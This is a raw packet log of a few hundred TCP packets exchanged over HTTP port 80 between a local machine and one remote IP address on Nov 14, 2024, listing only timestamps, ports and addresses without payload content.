                                                                                        Nov 14, 2024 08:15:36.851814985 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.851818085 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.851825953 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.851828098 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.851838112 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.851850033 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.851859093 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.851861000 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.851892948 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.882183075 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.882217884 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.882252932 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.882286072 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.882320881 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.882358074 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.882402897 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.882469893 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.952135086 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.952176094 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.952213049 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.952289104 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.953561068 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.953622103 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.953738928 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.953769922 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.953821898 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.953851938 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.953907013 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.953950882 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.953993082 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954030037 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954086065 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.954087973 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954165936 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954207897 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.954243898 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954310894 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954354048 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.954380035 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954413891 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954447985 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954457045 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.954484940 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954543114 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.954571009 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954611063 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954647064 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954658031 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.954745054 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954780102 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954787970 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.954813004 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954854965 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.954890013 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.954967976 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955003023 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955015898 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955033064 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955070019 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955077887 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955104113 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955149889 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955188036 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955220938 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955248117 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955270052 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955286980 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955334902 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955394983 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955427885 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955461025 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955476046 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955496073 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955528975 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955543995 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955558062 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955593109 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955599070 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955671072 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955708027 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955714941 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955741882 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955781937 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955790043 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955851078 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955895901 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.955894947 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955962896 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.955996990 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956020117 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956023932 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956058025 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956072092 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956091881 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956120968 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956139088 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956152916 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956185102 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956195116 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956217051 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956250906 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956258059 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956283092 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956315994 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956330061 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956347942 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956379890 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956402063 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956413031 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956445932 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956454992 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956485987 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956517935 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956526995 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956551075 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956583977 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956593037 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956615925 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956649065 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956655025 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956680059 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956712961 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956722975 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956744909 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956778049 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956787109 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956811905 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956845045 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956865072 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956877947 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956908941 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956921101 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.956943989 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956971884 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.956984997 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.957004070 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957036018 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957055092 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.957065105 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957096100 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957109928 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.957129002 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957160950 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957173109 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.957195044 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957227945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957236052 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.957259893 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957293034 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957298040 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.957324982 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.957381010 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.965845108 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.965925932 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.965987921 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.965991974 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966079950 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966131926 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966155052 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966227055 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966279984 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966279984 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966367960 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966411114 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966418982 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966454983 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966487885 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966500998 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966553926 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966598034 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966608047 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966675997 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966711044 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966725111 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966742992 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966788054 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966789007 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966866016 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966898918 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966911077 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966933012 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.966975927 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.966989994 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967022896 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967083931 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.967091084 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967150927 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967189074 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.967237949 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967287064 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967330933 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.967348099 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967444897 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967490911 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.967542887 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967624903 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967655897 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967669010 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.967691898 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967741013 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.967767954 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967799902 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967834949 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967844963 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.967865944 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967910051 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.967966080 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.967994928 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968029976 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968043089 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968067884 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968103886 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968111038 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968189001 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968231916 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968245029 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968281031 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968322039 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968332052 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968390942 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968434095 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968456030 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968483925 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968517065 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968528032 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968552113 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968583107 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968596935 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968637943 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968669891 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968691111 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968767881 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968802929 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968812943 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968835115 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968878984 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968892097 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968929052 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.968978882 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.968998909 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969032049 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969065905 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969078064 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969125032 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969171047 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969202042 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969228983 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969271898 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969279051 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969315052 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969347954 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969360113 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969384909 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969418049 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969433069 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969450951 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969495058 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969511032 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969558954 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969592094 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969604015 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969624996 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969661951 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969669104 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969738007 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969773054 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969780922 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969805956 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969842911 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969850063 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969876051 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969909906 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969923019 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.969943047 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969978094 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.969989061 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970010996 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970045090 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970056057 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970077038 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970108986 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970123053 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970136881 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970169067 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970181942 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970201969 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970235109 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970247030 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970268011 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970300913 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970312119 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970333099 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970361948 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970379114 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970393896 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970426083 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970438957 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970458031 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970500946 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970513105 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970531940 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970566988 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970575094 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970599890 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970632076 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970643044 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970664978 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970699072 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970711946 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970732927 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970772028 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970782042 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970805883 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970839024 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970853090 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970869064 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970901012 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970915079 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.970937014 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970969915 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.970983028 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.971100092 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.971122980 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.971136093 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.971153021 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.971178055 CET4970480192.168.2.5103.20.102.62
